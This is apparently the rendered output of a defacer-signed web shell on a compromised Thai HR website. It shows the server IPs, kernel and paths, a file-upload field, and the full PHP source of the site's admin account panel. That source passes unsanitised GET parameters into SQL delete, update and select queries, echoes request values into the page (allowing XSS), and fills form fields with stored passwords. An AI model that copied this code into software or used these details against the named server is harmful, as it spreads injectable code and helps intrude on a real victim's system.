1337 3YP455 5H311
:
216.73.216.0
:
119.59.104.17 / www.hrdigest.co.th
:
Linux re1.hostinglotus.net 4.18.0-553.58.1.el8_10.x86_64 #1 SMP Wed Jun 25 06:37:46 EDT 2025 x86_64
:
/
home
/
hrdigest
/
public_html
/
admin
/
UP104D F1L3:
files >> /home/hrdigest/public_html/admin/admin.php
<? // *****Copy right 2003 ,TNS NETWORK LTD.,PART.***** // require("../inc/function_admin.php"); $mem = checkid(); if(!eregi("^0$|^4$", $_SESSION["level"])){ @header("Location: admin_main.php"); exit; } if($_GET["action"] == "Delete" && !empty($_GET["id"])){ mysql_query("Delete From `login` Where `id_level` != '0' && `id` = '$_GET[id]'"); @header("Location: admin.php?name=$_GET[name]"); exit; } if(!empty($_POST["action"])){ $a_in = $b_in = $a_up = ""; foreach($_POST as $key => $value){ if(!eregi("^submit$|^action$|^id$", $key)){ $value = addslashes(stripslashes($value)); $a_in .= "`$key`, "; $b_in .= "'$value', "; $a_up .= "`$key` = '$value', "; } } $a_in = substr($a_in, 0, -2); $b_in = substr($b_in, 0, -2); $a_up = substr($a_up, 0, -2); if($_POST["action"] == "Add" && $_POST["id_level"] != '0'){ mysql_query("Insert Into `login` ($a_in) Values ($b_in)"); @header("Location: admin.php?name=$_GET[name]"); exit; }elseif($_POST["action"] == "Update"){ mysql_query("Update `login` Set $a_up Where `id_level` != '0' && `id` = '$_GET[id]'"); @header("Location: admin.php?name=$_GET[name]"); exit; } } ?> <html> <head> <? require("../inc/title.php") ?> <link href="index.css" rel="stylesheet" type="text/css"> <script type="text/javascript" src="calendarDateInput.js"></script> <script type="text/javascript"> <!-- function Delete(id){ if(confirm("คุณต้องการลบข้อมูลนี้หรือไม่ ?")){ if(confirm("ยืนยันการลบอีกครั้ง ?")){ location = "admin.php?name=<? echo $_GET["name"] ?>&action=Delete&id=" + id; } } } --> </script> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> </head> <body bgcolor="#ffffff"> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td valign="top"><? top_page() ?></td> </tr> </table> <table width="100%" height="100%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td width="200" valign="top" background="icon/bgbar.jpg"><? require("menu.php") ?></td> <td valign="top"><table width="95%" border="0" align="center" cellpadding="0" cellspacing="0"> <tr> <td valign="top"><table width="100%" border="0" cellpadding="5" cellspacing="0" class="main"> <tr> <td><b>:: <? echo $_GET["name"] ?> ::</b></td> </tr> </table> <? if(empty($_GET["action"])){ ?> <table width="100%" border="0" cellpadding="5" cellspacing="1" class="main border1"> <tr style="background:#0099cc; color:#ffffff;"> <td width="70" class="border4">ID</td> <td width="100" class="border4">Type</td> <td width="140" class="border4">Username</td> <td width="160" class="border4">First Name</td> <td width="160" class="border4">Last Name</td> <td width="" class="border4">E-mail</td> <td width="70" class="" align="center">Option</td> </tr> <? $result = mysql_query("Select * From `login` Where `id_level` != '0' Order By `id` Desc"); while($row = mysql_fetch_array($result)){ ?> <tr> <td class="border2 border4"><? echo $row["id"]; ?> </td> <td class="border2 border4"><? echo $_level["$row[id_level]"]; ?> </td> <td class="border2 border4"><? echo $row["uid"]; ?> </td> <td class="border2 border4"><? echo $row["name"]; ?> </td> <td class="border2 border4"><? echo $row["lastname"]; ?> </td> <td class="border2 border4"><? echo $row["email"]; ?> </td> <td class="border2" align="center"><a href="admin.php?name=<? echo $_GET["name"] ?>&action=Edit&id=<? echo $row["id"]; ?>"><img src="icon/show.gif" border="0" /></a> <a href="javascript:Delete('<? echo $row["id"]; ?>');"><img src="icon/del.gif" border="0" /></a></td> </tr> <? } ?> </table> <div style="height:40px;"></div> <form method="post"> <table width="100%" border="0" align="center" cellpadding="5" cellspacing="0" class="main"> <tr> <td>เพิ่ม <? echo $_GET["name"]; ?></td> </tr> </table> <table width="100%" border="0" align="center" cellpadding="5" cellspacing="1" class="main border1"> <tr> <td width="90" class="border4">ระดับ</td> <td> <select name="id_level" class="main"> <option value="1"<? if($row["id_level"] == "1") echo " selected"; ?>>HR</option> <option value="2"<? if($row["id_level"] == "2") echo " selected"; ?>>key-royal</option> <option value="3"<? if($row["id_level"] == "3") echo " selected"; ?>>Admin</option> <option value="4"<? if($row["id_level"] == "4") echo " selected"; ?>>Super-Admin</option> </select> </td> </tr> <tr> <td colspan="2" height="10" class="border2"> </td> </tr> <tr> <td class="border2 border4">User Name</td> <td class="border2"><input type="text" name="uid" value="<? echo $row["uid"]; ?>" class="main" style="width:250px;" /></td> </tr> <tr> <td class="border2 border4">Password</td> <td class="border2"><input type="password" name="pw" value="<? echo $row["pw"]; ?>" class="main" style="width:250px;" /></td> </tr> <tr> <td class="border2 border4">First Name</td> <td class="border2"><input type="text" name="name" value="<? echo $row["name"]; ?>" class="main" style="width:250px;" /></td> </tr> <tr> <td class="border2 border4">Last Name</td> <td class="border2"><input type="text" name="lastname" value="<? echo $row["lastname"]; ?>" class="main" style="width:250px;" /></td> </tr> <tr> <td class="border2 border4">E-mail address</td> <td class="border2"><input type="text" name="email" value="<? echo $row["email"]; ?>" class="main" style="width:250px;" /></td> </tr> <tr> <td class="border2 border4"> </td> <td class="border2"> <input type="submit" value="Add" class="main" style="width:80px;" /> <input type="reset" value="Reset" class="main" style="width:80px;" /> <input type="hidden" name="action" value="Add" /> </td> </tr> </table> </form> <? }elseif($_GET["action"] == "Edit" && $row = mysql_fetch_array(mysql_query("Select * From `login` Where `id` = '$_GET[id]'"))){ ?> <form method="post"> <table width="100%" border="0" align="center" cellpadding="5" cellspacing="0" class="main"> <tr> <td>แก้ไข <? echo $_GET["name"]; ?></td> </tr> </table> <table width="100%" border="0" align="center" cellpadding="5" cellspacing="1" class="main border1"> <tr> <td width="90" class="border4">ระดับ</td> <td> <select name="id_level" class="main"> <option value="1"<? if($row["id_level"] == "1") echo " selected"; ?>>HR</option> <option value="2"<? if($row["id_level"] == "2") echo " selected"; ?>>key-royal</option> <option value="3"<? if($row["id_level"] == "3") echo " selected"; ?>>Admin</option> <option value="4"<? if($row["id_level"] == "4") echo " selected"; ?>>Super-Admin</option> </select> </td> </tr> <tr> <td colspan="2" height="10" class="border2"> </td> </tr> <tr> <td class="border2 border4">User Name</td> <td class="border2"><input type="text" name="uid" value="<? echo $row["uid"]; ?>" class="main" style="width:250px;" /></td> </tr> <tr> <td class="border2 border4">Password</td> <td class="border2"><input type="password" name="pw" value="<? echo $row["pw"]; ?>" class="main" style="width:250px;" /></td> </tr> <tr> <td class="border2 border4">First Name</td> <td class="border2"><input type="text" name="name" value="<? echo $row["name"]; ?>" class="main" style="width:250px;" /></td> </tr> <tr> <td class="border2 border4">Last Name</td> <td class="border2"><input type="text" name="lastname" value="<? echo $row["lastname"]; ?>" class="main" style="width:250px;" /></td> </tr> <tr> <td class="border2 border4">E-mail address</td> <td class="border2"><input type="text" name="email" value="<? echo $row["email"]; ?>" class="main" style="width:250px;" /></td> </tr> <tr> <td class="border2 border4"> </td> <td class="border2"> <input type="submit" value="Update" class="main" style="width:80px;" /> <input type="reset" value="Reset" class="main" style="width:80px;" /> <input type="button" value="Back" class="main" style="width:80px;" onClick="location='admin.php?name=<? echo $_GET["name"] ?>';" /> <input type="hidden" name="action" value="Update" /> </td> </tr> </table> </form> <? } ?> </td> </tr> </table></td> </tr> </table> </body> </html>
1337r0j4n | 13379H0575 53CURI7Y 734M